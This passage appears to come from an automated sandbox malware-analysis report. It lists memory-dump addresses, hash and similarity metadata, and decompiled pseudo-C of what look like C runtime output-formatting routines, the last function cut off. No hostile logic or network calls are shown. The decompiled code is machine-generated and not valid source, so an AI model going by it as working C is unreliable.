                                                                                                                            0x25bf8a7d5a2
                                                                                                                            0x25bf8a7d5a7
                                                                                                                            0x25bf8a7d5ab
                                                                                                                            0x25bf8a7d5b0
                                                                                                                            0x25bf8a7d5b5
                                                                                                                            0x25bf8a7d5ba
                                                                                                                            0x25bf8a7d5be
                                                                                                                            0x25bf8a7d5c3
                                                                                                                            0x25bf8a7d5c8
                                                                                                                            0x25bf8a7d5cd
                                                                                                                            0x25bf8a7d5d2
                                                                                                                            0x25bf8a7d5d7
                                                                                                                            0x25bf8a7d5da
                                                                                                                            0x25bf8a7d5dd
                                                                                                                            0x25bf8a7d5e2
                                                                                                                            0x25bf8a7d5e9
                                                                                                                            0x25bf8a7d5ee
                                                                                                                            0x25bf8a7d5f0
                                                                                                                            0x25bf8a7d5f5
                                                                                                                            0x25bf8a7d5fb
                                                                                                                            0x25bf8a7d603
                                                                                                                            0x25bf8a7d606
                                                                                                                            0x25bf8a7d60e
                                                                                                                            0x25bf8a7d614
                                                                                                                            0x25bf8a7d644

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                                                            • String ID: $@
                                                                                                                            • API String ID: 3318157856-1077428164
                                                                                                                            • Opcode ID: ed96f0972bd3634f2cb84389868e4d8d838c71ba02ca3a0da481af1314c55da3
                                                                                                                            • Instruction ID: 9222cab5a1537683154aa514240b8a6ceb917ecb3e13f427ae40821ac413bca9
                                                                                                                            • Opcode Fuzzy Hash: ed96f0972bd3634f2cb84389868e4d8d838c71ba02ca3a0da481af1314c55da3
                                                                                                                            • Instruction Fuzzy Hash: D352F273208E8486FF668B14DD4C36E6BA0F7417A6F341205FE5616EDCD738C942AB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ACCD54 Relevance: 30.8, APIs: 16, Strings: 1, Instructions: 1022COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2950348734-3916222277
                                                                                                                            • Opcode ID: ea3213b9682e98405a1615abe1ce07939885694a526b1c47d1212e38588b1968
                                                                                                                            • Instruction ID: c5b22717aaf19f21a2baf421a7eaed5de2e363b312c4b6f0ddf1d35b2af1825a
                                                                                                                            • Opcode Fuzzy Hash: ea3213b9682e98405a1615abe1ce07939885694a526b1c47d1212e38588b1968
                                                                                                                            • Instruction Fuzzy Hash: FF62FB32A18E498AFF6A9B18CC4936977D1FB97326F34011DF4A7C39E1D734D8028659
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A80144 Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 460COMMONLIBRARYCODECrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 61%
                                                                                                                            			E0000025B25BF8A80144(void* __ebx, signed long long __ecx, void* __edx, signed int __esi, void* __rax, long long __rbx, char* __rdx, void* __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* __r13;
				void* _t189;
				void* _t197;
				intOrPtr _t198;
				signed int _t205;
				signed int _t209;
				char _t219;
				signed int _t225;
				signed int _t231;
				signed int _t235;
				intOrPtr _t239;
				signed int _t249;
				intOrPtr _t261;
				char _t265;
				void* _t300;
				void* _t301;
				void* _t302;
				signed long long _t369;
				signed long long _t370;
				intOrPtr _t373;
				intOrPtr* _t394;
				signed int* _t396;
				signed long long _t398;
				intOrPtr* _t399;
				signed short* _t401;
				signed short* _t402;
				intOrPtr _t404;
				intOrPtr _t416;
				intOrPtr* _t427;
				intOrPtr _t440;
				signed long long _t454;
				void* _t456;
				char* _t457;
				char* _t458;
				short* _t461;
				signed int* _t462;
				void* _t466;
				void* _t467;
				void* _t469;
				signed long long _t470;
				void* _t482;
				signed long long _t484;
				void* _t486;
				signed long long _t488;
				signed long long _t490;
				intOrPtr* _t491;
				signed short* _t492;
				void* _t496;
				char* _t497;
				void* _t499;

				_t481 = __r11;
				_t438 = __rdx;
				 *((long long*)(_t469 + 0x20)) = __rbx;
				_t467 = _t469 - 0x1a30;
				E0000025B25BF8A7A9C0(0x1b30, __rax, __r10, __r11);
				_t470 = _t469 - __rax;
				_t369 =  *0xf8a9c990; // 0x18002eb3c
				_t370 = _t369 ^ _t470;
				 *(_t467 + 0x1a20) = _t370;
				r15d = r8d;
				_t497 = __rdx;
				 *(_t470 + 0x48) =  *(_t470 + 0x48) & 0;
				_t398 = __ecx;
				if (r8d != 0) goto 0xf8a80195;
				goto 0xf8a80856;
				if (__rdx != 0) goto 0xf8a801b9;
				E0000025B25BF8A7B82C(_t370);
				 *_t370 =  *_t370 & 0;
				_t189 = E0000025B25BF8A7B89C(_t370);
				 *_t370 = 0x16;
				E0000025B25BF8A7BEC4(_t189);
				goto 0xf8a80856;
				_t488 = _t398 >> 5;
				r12d = r12d & 0x0000001f;
				_t404 =  *((intOrPtr*)(0xf8aa3200 + _t488 * 8));
				 *(_t470 + 0x50) = _t488;
				_t484 = _t398 * 0x58;
				sil =  *(_t484 + _t404 + 0x38);
				sil = sil + sil;
				sil = sil >> 1;
				if (_t456 - 1 - 1 > 0) goto 0xf8a801f6;
				if (( !r15d & 0x00000001) == 0) goto 0xf8a8019a;
				if (( *(_t484 + _t404 + 8) & 0x00000020) == 0) goto 0xf8a8020b;
				_t18 = _t438 + 2; // 0x2
				r8d = _t18;
				E0000025B25BF8A8191C(__ebx, __ebx, 0xf8aa3200, _t398, __rdx, _t456);
				if (E0000025B25BF8A82D3C(__ebx, 0, 0xf8aa3200) == 0) goto 0xf8a804d6;
				_t373 =  *((intOrPtr*)(0xf8aa3200 + _t488 * 8));
				if (( *(_t484 + 0x25bf8aa3208) & 0x00000080) == 0) goto 0xf8a804d6;
				_t197 = E0000025B25BF8A7F654(_t373);
				_t249 = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t373 + 0xc0)) + 0x138)) == _t398;
				"ntdll.dll"();
				if (_t197 == 0) goto 0xf8a804d6;
				if (_t249 == 0) goto 0xf8a80278;
				if (sil == 0) goto 0xf8a804d6;
				_t198 = E0000025B25BF8A8B800(_t197, _t249, __ebx, 0, __esi, _t301, _t302, sil, 0xf8aa3200,  *((intOrPtr*)(_t484 +  *((intOrPtr*)(0xf8aa3200 + _t488 * 8)))), _t470 + 0x5c, _t454, _t456, _t481, _t488);
				 *(_t470 + 0x58) =  *(_t470 + 0x58) & 0;
				_t399 = _t497;
				 *((intOrPtr*)(_t470 + 0x5c)) = _t198;
				if (r15d == 0) goto 0xf8a804cd;
				if (sil != 0) goto 0xf8a8041f;
				_t265 =  *_t399;
				 *(_t470 + 0x44) = 0 | _t265 == 0x0000000a;
				_t440 =  *((intOrPtr*)(0xf8aa3200 + _t488 * 8));
				if ( *(_t484 + _t440 + 0x50) == 0) goto 0xf8a802dc;
				 *((char*)(_t470 + 0x61)) = _t265;
				r8d = 2;
				 *((char*)(_t470 + 0x60)) =  *((intOrPtr*)(_t484 + _t440 + 0x4c));
				 *(_t484 + _t440 + 0x50) =  *(_t484 + _t440 + 0x50) & 0x00000000;
				goto 0xf8a80325;
				if (E0000025B25BF8A831D8(_t265,  *(_t484 + _t440 + 0x50), 0xf8aa3200, _t470 + 0x60) == 0) goto 0xf8a8031c;
				if (_t499 - _t399 + _t497 - 1 <= 0) goto 0xf8a804a3;
				r8d = 2;
				if (E0000025B25BF8A84AE4(_t265, _t499) == 0xffffffff) goto 0xf8a804c4;
				goto 0xf8a80338;
				r8d = 1;
				if (E0000025B25BF8A84AE4(_t265, _t496) == 0xffffffff) goto 0xf8a804c4;
				 *(_t470 + 0x38) =  *(_t470 + 0x38) & 0x00000000;
				 *(_t470 + 0x30) =  *(_t470 + 0x30) & 0x00000000;
				r9d = 1;
				 *((intOrPtr*)(_t470 + 0x28)) = 5;
				_t401 = _t399 + 2;
				 *(_t470 + 0x20) = _t470 + 0x60;
				_t205 = E0000025B25BF8A8B910(_t204, _t249,  *((intOrPtr*)(_t470 + 0x5c)), 0, __esi, _t301, _t470 + 0x60, _t454, _t456, _t481, _t488);
				r13d = _t205;
				if (_t205 == 0) goto 0xf8a804c4;
				 *(_t470 + 0x20) =  *(_t470 + 0x20) & 0x00000000;
				r8d = r13d;
				if ( *0xf8a8b6f8(_t454, _t456, _t466) == 0) goto 0xf8a807de;
				if ( *(_t470 + 0x58) - r13d < 0) goto 0xf8a804c4;
				if ( *(_t470 + 0x44) == 0) goto 0xf8a80494;
				 *(_t470 + 0x20) =  *(_t470 + 0x20) & 0x00000000;
				 *((char*)(_t470 + 0x60)) = 0xd;
				r8d = 1;
				if ( *0xf8a8b6f8() == 0) goto 0xf8a807de;
				if ( *(_t470 + 0x58) - 1 < 0) goto 0xf8a804c4;
				 *(_t470 + 0x48) =  *(_t470 + 0x48) + 1;
				goto 0xf8a80494;
				if (_t456 - 1 - 1 > 0) goto 0xf8a80444;
				_t209 =  *_t401 & 0x0000ffff;
				r13d = 0;
				 *(_t470 + 0x40) = _t209;
				r13b = _t209 == 0xa;
				_t402 =  &(_t401[1]);
				 *(_t470 + 0x44) = r13d;
				goto 0xf8a80449;
				r13d =  *(_t470 + 0x44);
				if (_t456 - 1 - 1 > 0) goto 0xf8a8048f;
				if (E0000025B25BF8A84AEC( *(_t470 + 0x40) & 0x0000ffff, _t486) !=  *(_t470 + 0x40)) goto 0xf8a807de;
				if (r13d == 0) goto 0xf8a8048f;
				 *(_t470 + 0x40) = 0xd;
				if (E0000025B25BF8A84AEC(0xd, _t482) !=  *(_t470 + 0x40)) goto 0xf8a807de;
				 *(_t470 + 0x48) =  *(_t470 + 0x48) + 1;
				_t490 =  *(_t470 + 0x50);
				if (_t249 - r14d - r15d >= 0) goto 0xf8a804c4;
				goto 0xf8a80292;
				 *((char*)(_t484 +  *((intOrPtr*)(0xf8aa3200 + _t490 * 8)) + 0x4c)) =  *_t402;
				 *(_t484 +  *((intOrPtr*)(0xf8aa3200 + _t490 * 8)) + 0x50) = 1;
				goto 0xf8a807e6;
				goto 0xf8a807ea;
				_t416 =  *((intOrPtr*)(0xf8aa3200 + _t490 * 8));
				if (( *(_t484 + _t416 + 8) & 0x00000080) == 0) goto 0xf8a807b8;
				_t491 = _t497;
				 *(_t470 + 0x44) = 0;
				if (sil != 0) goto 0xf8a805c7;
				if (r15d == 0) goto 0xf8a80816;
				_t115 =  &(_t402[6]); // 0xd
				_t457 = _t467 + 0x620;
				if (r13d - r14d - r15d >= 0) goto 0xf8a80549;
				_t219 =  *_t491;
				_t492 = _t491 + 1;
				if (_t219 != 0xa) goto 0xf8a80538;
				 *_t457 = _t115;
				_t458 = _t457 + 1;
				 *_t458 = _t219;
				if (_t416 + 2 - 0x13ff < 0) goto 0xf8a80518;
				 *(_t470 + 0x20) =  *(_t470 + 0x20) & 0x00000000;
				r8d = __esi;
				r8d = r8d - _t219;
				 *(_t470 + 0x48) =  *(_t470 + 0x48) + 1;
				if ( *0xf8a8b6f8() == 0) goto 0xf8a807de;
				if ( *((intOrPtr*)(_t470 + 0x4c)) - _t458 + 1 - _t467 + 0x620 < 0) goto 0xf8a807e6;
				if (r13d - r14d - r15d < 0) goto 0xf8a8050b;
				goto 0xf8a807e6;
				if (sil != 2) goto 0xf8a806a6;
				if (r15d == 0) goto 0xf8a80816;
				_t461 = _t467 + 0x620;
				if (r13d - r14d - r15d >= 0) goto 0xf8a80628;
				_t225 =  *_t492 & 0x0000ffff;
				if (_t225 != 0xa) goto 0xf8a80614;
				 *_t461 = 0xd;
				_t462 = _t461 + 2;
				 *_t462 = _t225;
				if ( *((intOrPtr*)(_t484 +  *((intOrPtr*)(0xf8aa3200 +  *(_t470 + 0x50) * 8)))) + 4 - 0x13fe < 0) goto 0xf8a805ec;
				 *(_t470 + 0x20) =  *(_t470 + 0x20) & 0x00000000;
				r8d = __esi;
				r8d = r8d - _t225;
				 *(_t470 + 0x48) =  *(_t470 + 0x48) + 2;
				if ( *0xf8a8b6f8() == 0) goto 0xf8a807de;
				if ( *((intOrPtr*)(_t470 + 0x4c)) -  &(_t462[0]) - _t467 + 0x620 < 0) goto 0xf8a807e6;
				if (r13d - r14d - r15d < 0) goto 0xf8a805df;
				goto 0xf8a807e6;
				if (r15d == 0) goto 0xf8a80816;
				r8d = 0xd;
				_t427 = _t470 + 0x70;
				if (r13d - r14d - r15d >= 0) goto 0xf8a806f6;
				_t231 = _t492[1] & 0x0000ffff;
				if (_t231 != 0xa) goto 0xf8a806e2;
				 *_t427 = r8w;
				 *(_t427 + 2) = _t231;
				if (_t467 + 0x624 - 0x6a8 < 0) goto 0xf8a806bc;
				 *(_t470 + 0x38) =  *(_t470 + 0x38) & 0x00000000;
				 *(_t470 + 0x30) =  *(_t470 + 0x30) & 0x00000000;
				 *((intOrPtr*)(_t470 + 0x28)) = 0xd55;
				asm("cdq");
				r9d = 0 - _t231 >> 1;
				 *(_t470 + 0x20) = _t467 + 0x620;
				_t235 = E0000025B25BF8A8B910(0 - _t231 >> 1,  *(_t470 + 0x44), 0xfde9, 0, __esi, _t301, _t467 + 0x620, _t454,  &(_t462[0]) - _t467 + 0x620, _t481,  &(_t492[2]));
				 *(_t470 + 0x44) = _t235;
				if (_t235 == 0) goto 0xf8a807de;
				 *(_t470 + 0x20) =  *(_t470 + 0x20) & 0x00000000;
				r8d = _t235;
				_t394 =  *(_t470 + 0x50);
				r8d = r8d;
				if ( *0xf8a8b6f8() == 0) goto 0xf8a80791;
				_t300 = 0 +  *((intOrPtr*)(_t470 + 0x4c));
				if ( *(_t470 + 0x44) - _t300 > 0) goto 0xf8a80747;
				goto 0xf8a8079d;
				"\\%s: %d"();
				if ( *(_t470 + 0x44) - _t300 > 0) goto 0xf8a807e6;
				r8d = 0xd;
				if (r13d - r14d - r15d < 0) goto 0xf8a806b5;
				goto 0xf8a807e6;
				 *(_t470 + 0x20) =  *(_t470 + 0x20) & _t454;
				r8d = r15d;
				_t239 =  *0xf8a8b6f8();
				if (_t239 == 0) goto 0xf8a807de;
				goto 0xf8a807e6;
				"\\%s: %d"();
				_t261 = _t239;
				if ( *((intOrPtr*)(_t470 + 0x4c)) != 0) goto 0xf8a80850;
				if (_t261 == 0) goto 0xf8a80816;
				if (_t261 != 5) goto 0xf8a8080a;
				E0000025B25BF8A7B89C(_t394);
				 *_t394 = 9;
				E0000025B25BF8A7B82C(_t394);
				 *_t394 = _t261;
				goto 0xf8a801b1;
				E0000025B25BF8A7B84C(_t261, _t394, _t402);
				goto 0xf8a801b1;
				_t396 =  *((intOrPtr*)(0xf8aa3200 +  *(_t470 + 0x50) * 8));
				if (( *( &(_t396[2]) + _t484) & 0x00000040) == 0) goto 0xf8a80838;
				if ( *_t497 == 0x1a) goto 0xf8a8018e;
				E0000025B25BF8A7B89C(_t396);
				 *_t396 = 0x1c;
				E0000025B25BF8A7B82C(_t396);
				 *_t396 =  *_t396 & 0x00000000;
				goto 0xf8a801b1;
				return E0000025B25BF8A81A50(_t261, _t402,  *(_t467 + 0x1a20) ^ _t470, _t497, _t454,  &(_t462[0]) - _t467 + 0x620, _t467, _t484);
			}

























































                                                                                                                            0x25bf8a80144
                                                                                                                            0x25bf8a80144
                                                                                                                            0x25bf8a80144
                                                                                                                            0x25bf8a80154
                                                                                                                            0x25bf8a80161
                                                                                                                            0x25bf8a80166
                                                                                                                            0x25bf8a80169
                                                                                                                            0x25bf8a80170
                                                                                                                            0x25bf8a80173
                                                                                                                            0x25bf8a8017c
                                                                                                                            0x25bf8a8017f
                                                                                                                            0x25bf8a80182
                                                                                                                            0x25bf8a80186
                                                                                                                            0x25bf8a8018c
                                                                                                                            0x25bf8a80190
                                                                                                                            0x25bf8a80198
                                                                                                                            0x25bf8a8019a
                                                                                                                            0x25bf8a8019f
                                                                                                                            0x25bf8a801a1
                                                                                                                            0x25bf8a801a6
                                                                                                                            0x25bf8a801ac
                                                                                                                            0x25bf8a801b4
                                                                                                                            0x25bf8a801c6
                                                                                                                            0x25bf8a801ca
                                                                                                                            0x25bf8a801ce
                                                                                                                            0x25bf8a801d2
                                                                                                                            0x25bf8a801d7
                                                                                                                            0x25bf8a801db
                                                                                                                            0x25bf8a801e0
                                                                                                                            0x25bf8a801e3
                                                                                                                            0x25bf8a801eb
                                                                                                                            0x25bf8a801f4
                                                                                                                            0x25bf8a801fc
                                                                                                                            0x25bf8a80202
                                                                                                                            0x25bf8a80202
                                                                                                                            0x25bf8a80206
                                                                                                                            0x25bf8a80214
                                                                                                                            0x25bf8a80221
                                                                                                                            0x25bf8a8022b
                                                                                                                            0x25bf8a80231
                                                                                                                            0x25bf8a8025a
                                                                                                                            0x25bf8a8025d
                                                                                                                            0x25bf8a80265
                                                                                                                            0x25bf8a8026d
                                                                                                                            0x25bf8a80272
                                                                                                                            0x25bf8a80278
                                                                                                                            0x25bf8a8027e
                                                                                                                            0x25bf8a80282
                                                                                                                            0x25bf8a80285
                                                                                                                            0x25bf8a8028c
                                                                                                                            0x25bf8a80295
                                                                                                                            0x25bf8a8029b
                                                                                                                            0x25bf8a802a5
                                                                                                                            0x25bf8a802b0
                                                                                                                            0x25bf8a802ba
                                                                                                                            0x25bf8a802c1
                                                                                                                            0x25bf8a802c5
                                                                                                                            0x25bf8a802cb
                                                                                                                            0x25bf8a802cf
                                                                                                                            0x25bf8a802da
                                                                                                                            0x25bf8a802e6
                                                                                                                            0x25bf8a802f5
                                                                                                                            0x25bf8a80300
                                                                                                                            0x25bf8a80311
                                                                                                                            0x25bf8a8031a
                                                                                                                            0x25bf8a8031c
                                                                                                                            0x25bf8a80332
                                                                                                                            0x25bf8a80338
                                                                                                                            0x25bf8a8033e
                                                                                                                            0x25bf8a80352
                                                                                                                            0x25bf8a8035a
                                                                                                                            0x25bf8a80362
                                                                                                                            0x25bf8a80365
                                                                                                                            0x25bf8a8036a
                                                                                                                            0x25bf8a80370
                                                                                                                            0x25bf8a80375
                                                                                                                            0x25bf8a80380
                                                                                                                            0x25bf8a8039f
                                                                                                                            0x25bf8a803aa
                                                                                                                            0x25bf8a803be
                                                                                                                            0x25bf8a803ce
                                                                                                                            0x25bf8a803d4
                                                                                                                            0x25bf8a803e1
                                                                                                                            0x25bf8a803f8
                                                                                                                            0x25bf8a80406
                                                                                                                            0x25bf8a80411
                                                                                                                            0x25bf8a80417
                                                                                                                            0x25bf8a8041d
                                                                                                                            0x25bf8a80424
                                                                                                                            0x25bf8a80426
                                                                                                                            0x25bf8a80429
                                                                                                                            0x25bf8a80430
                                                                                                                            0x25bf8a80435
                                                                                                                            0x25bf8a80439
                                                                                                                            0x25bf8a8043d
                                                                                                                            0x25bf8a80442
                                                                                                                            0x25bf8a80444
                                                                                                                            0x25bf8a8044e
                                                                                                                            0x25bf8a8045f
                                                                                                                            0x25bf8a8046b
                                                                                                                            0x25bf8a80474
                                                                                                                            0x25bf8a80483
                                                                                                                            0x25bf8a8048b
                                                                                                                            0x25bf8a8048f
                                                                                                                            0x25bf8a8049c
                                                                                                                            0x25bf8a8049e
                                                                                                                            0x25bf8a804b2
                                                                                                                            0x25bf8a804bb
                                                                                                                            0x25bf8a804c8
                                                                                                                            0x25bf8a804d1
                                                                                                                            0x25bf8a804dd
                                                                                                                            0x25bf8a804e7
                                                                                                                            0x25bf8a804ef
                                                                                                                            0x25bf8a804f2
                                                                                                                            0x25bf8a804f9
                                                                                                                            0x25bf8a80502
                                                                                                                            0x25bf8a80508
                                                                                                                            0x25bf8a8050f
                                                                                                                            0x25bf8a80521
                                                                                                                            0x25bf8a80523
                                                                                                                            0x25bf8a80527
                                                                                                                            0x25bf8a8052c
                                                                                                                            0x25bf8a8052e
                                                                                                                            0x25bf8a80532
                                                                                                                            0x25bf8a8053b
                                                                                                                            0x25bf8a80547
                                                                                                                            0x25bf8a80549
                                                                                                                            0x25bf8a80556
                                                                                                                            0x25bf8a80559
                                                                                                                            0x25bf8a8057c
                                                                                                                            0x25bf8a8058c
                                                                                                                            0x25bf8a805a8
                                                                                                                            0x25bf8a805bc
                                                                                                                            0x25bf8a805c2
                                                                                                                            0x25bf8a805cb
                                                                                                                            0x25bf8a805d4
                                                                                                                            0x25bf8a805e3
                                                                                                                            0x25bf8a805f5
                                                                                                                            0x25bf8a805f7
                                                                                                                            0x25bf8a80604
                                                                                                                            0x25bf8a80606
                                                                                                                            0x25bf8a8060c
                                                                                                                            0x25bf8a80618
                                                                                                                            0x25bf8a80626
                                                                                                                            0x25bf8a80628
                                                                                                                            0x25bf8a80635
                                                                                                                            0x25bf8a80638
                                                                                                                            0x25bf8a8065b
                                                                                                                            0x25bf8a8066b
                                                                                                                            0x25bf8a80687
                                                                                                                            0x25bf8a8069b
                                                                                                                            0x25bf8a806a1
                                                                                                                            0x25bf8a806a9
                                                                                                                            0x25bf8a806af
                                                                                                                            0x25bf8a806b5
                                                                                                                            0x25bf8a806c5
                                                                                                                            0x25bf8a806c7
                                                                                                                            0x25bf8a806d4
                                                                                                                            0x25bf8a806d6
                                                                                                                            0x25bf8a806e6
                                                                                                                            0x25bf8a806f4
                                                                                                                            0x25bf8a806f6
                                                                                                                            0x25bf8a806fc
                                                                                                                            0x25bf8a8070e
                                                                                                                            0x25bf8a8071d
                                                                                                                            0x25bf8a80724
                                                                                                                            0x25bf8a8072e
                                                                                                                            0x25bf8a80733
                                                                                                                            0x25bf8a80739
                                                                                                                            0x25bf8a8073f
                                                                                                                            0x25bf8a80747
                                                                                                                            0x25bf8a8074d
                                                                                                                            0x25bf8a80750
                                                                                                                            0x25bf8a8076e
                                                                                                                            0x25bf8a80781
                                                                                                                            0x25bf8a80783
                                                                                                                            0x25bf8a8078d
                                                                                                                            0x25bf8a8078f
                                                                                                                            0x25bf8a80791
                                                                                                                            0x25bf8a8079f
                                                                                                                            0x25bf8a807a4
                                                                                                                            0x25bf8a807b0
                                                                                                                            0x25bf8a807b6
                                                                                                                            0x25bf8a807bc
                                                                                                                            0x25bf8a807c6
                                                                                                                            0x25bf8a807cc
                                                                                                                            0x25bf8a807d4
                                                                                                                            0x25bf8a807dc
                                                                                                                            0x25bf8a807de
                                                                                                                            0x25bf8a807e4
                                                                                                                            0x25bf8a807e8
                                                                                                                            0x25bf8a807ec
                                                                                                                            0x25bf8a807f1
                                                                                                                            0x25bf8a807f3
                                                                                                                            0x25bf8a807f8
                                                                                                                            0x25bf8a807fe
                                                                                                                            0x25bf8a80803
                                                                                                                            0x25bf8a80805
                                                                                                                            0x25bf8a8080c
                                                                                                                            0x25bf8a80811
                                                                                                                            0x25bf8a80822
                                                                                                                            0x25bf8a8082c
                                                                                                                            0x25bf8a80832
                                                                                                                            0x25bf8a80838
                                                                                                                            0x25bf8a8083d
                                                                                                                            0x25bf8a80843
                                                                                                                            0x25bf8a80848
                                                                                                                            0x25bf8a8084b
                                                                                                                            0x25bf8a8087f

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 3902385426-4171548499
                                                                                                                            • Opcode ID: f5253bed9487a14fdae6fa9298568b7ed63ecb77f3cc5c6eee4d39586fcadd6e
                                                                                                                            • Instruction ID: 82313c937c52639eae01ad825c33fb2dee4c3f04916f3aadd54390b2923e3336
                                                                                                                            • Opcode Fuzzy Hash: f5253bed9487a14fdae6fa9298568b7ed63ecb77f3cc5c6eee4d39586fcadd6e
                                                                                                                            • Instruction Fuzzy Hash: 1C12E433214E4186EF228F25EC483AEB7A0F795766F604116FA8943ED5DB39C455CB38
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A7C2CC Relevance: 25.1, APIs: 13, Strings: 1, Instructions: 594COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 43%
                                                                                                                            			_entry_(void* __ebx, void* __edx, void* __r9, long long __r10, void* __r11, signed int __r12, intOrPtr* __r13) {
				void* _t177;
				void* _t178;
				void* _t181;
				void* _t185;
				void* _t188;
				char _t189;
				signed int _t190;
				void* _t194;
				signed int _t195;
				void* _t199;
				signed int _t200;
				signed int _t205;
				signed int _t211;
				void* _t217;
				signed int _t232;
				signed int _t247;
				void* _t259;
				signed int _t265;
				signed int _t267;
				signed int _t273;
				void* _t274;
				intOrPtr _t284;
				signed int _t311;
				signed int _t317;
				void* _t325;
				char* _t329;
				signed int _t335;
				void* _t359;
				intOrPtr _t374;
				char* _t378;
				long long* _t379;
				signed long long _t383;
				intOrPtr _t386;
				void* _t389;
				char* _t391;
				char* _t393;
				char* _t395;
				signed short* _t396;
				signed long long _t398;
				void* _t399;
				intOrPtr* _t400;
				void* _t426;
				signed int* _t434;
				signed int* _t435;
				signed int* _t436;
				signed int* _t437;
				void* _t441;
				void* _t444;
				signed long long _t446;
				signed long long _t451;
				intOrPtr* _t476;
				intOrPtr* _t478;
				long long _t481;
				intOrPtr* _t482;
				signed int* _t483;

				asm("por mm0, [ebx]");
				_t398 = r10d;
				_t247 =  *(__edx + _t398 * 8 + __r9 + 0x2e520) >> 4;
				 *(_t446 + 0x58) = _t247;
				_t273 = _t247;
				if (_t273 == 0) goto 0xf8a7c9e1;
				if (_t273 == 0) goto 0xf8a7cafb;
				if (_t273 == 0) goto 0xf8a7caab;
				if (_t273 == 0) goto 0xf8a7ca6f;
				if (_t273 == 0) goto 0xf8a7ca67;
				if (_t273 == 0) goto 0xf8a7ca32;
				if (_t273 == 0) goto 0xf8a7c957;
				if (_t273 != 0) goto 0xf8a7c942;
				_t232 = r15b;
				_t274 = _t232 - 0x64;
				if (_t274 > 0) goto 0xf8a7c4a4;
				if (_t274 == 0) goto 0xf8a7c5a5;
				if (_t232 == 0x41) goto 0xf8a7c479;
				if (_t232 == 0x43) goto 0xf8a7c41f;
				if ((_t398 - 0x00000045 & 0xfffffffd) == 0) goto 0xf8a7c479;
				if (_t232 == 0x53) goto 0xf8a7c3d3;
				if (_t232 == 0x58) goto 0xf8a7c53e;
				if (_t232 == 0x5a) goto 0xf8a7c38b;
				if (_t232 == 0x61) goto 0xf8a7c485;
				if (_t232 == 0x63) goto 0xf8a7c42d;
				goto 0xf8a7c7b0;
				_t374 =  *__r13;
				_t476 = __r13 + 8;
				if (_t374 == 0) goto 0xf8a7c3c7;
				_t284 =  *((intOrPtr*)(_t374 + 8));
				if (_t284 == 0) goto 0xf8a7c3c7;
				asm("inc ecx");
				if (_t284 >= 0) goto 0xf8a7c3bd;
				asm("cdq");
				 *(_t446 + 0x50) = 1;
				goto 0xf8a7c7ac;
				 *(_t446 + 0x50) = r10d;
				goto 0xf8a7c7ac;
				goto 0xf8a7c7a1;
				if ((r14d & 0x00000830) != 0) goto 0xf8a7c3e1;
				asm("inc ecx");
				_t386 =  *_t476;
				_t177 =  ==  ? 0x7fffffff : r12d;
				if ((r14d & 0x00000810) == 0) goto 0xf8a7c50a;
				 *(_t446 + 0x50) = 1;
				_t387 =  ==  ?  *0xf8a9c5c0 : _t386;
				_t399 =  ==  ?  *0xf8a9c5c0 : _t386;
				goto 0xf8a7c4fe;
				if ((r14d & 0x00000830) != 0) goto 0xf8a7c42d;
				asm("inc ecx");
				_t478 = _t476 + 0x10;
				if ((r14d & 0x00000810) == 0) goto 0xf8a7c461;
				r9d =  *(_t478 - 8) & 0x0000ffff;
				_t426 = _t444 - 0x30;
				_t400 = _t446 + 0x44;
				_t178 = E0000025B25BF8A833AC();
				r10d = 0;
				if (_t178 == 0) goto 0xf8a7c470;
				 *(_t446 + 0x5c) = 1;
				goto 0xf8a7c470;
				 *(_t446 + 0x44) = 1;
				 *((char*)(_t444 - 0x30)) =  *(_t478 - 8);
				goto 0xf8a7c7b0;
				 *(_t446 + 0x78) = 1;
				r15b = r15b + 0x20;
				r14d = r14d | 0x00000040;
				_t389 = _t444 - 0x30;
				_t267 = r11d;
				if (r12d >= 0) goto 0xf8a7c6c3;
				r12d = 6;
				goto 0xf8a7c709;
				if (0x7fffffff - 0x65 < 0) goto 0xf8a7c7b0;
				if (0x7fffffff - 0x67 <= 0) goto 0xf8a7c485;
				if (0x7fffffff == 0x69) goto 0xf8a7c5a5;
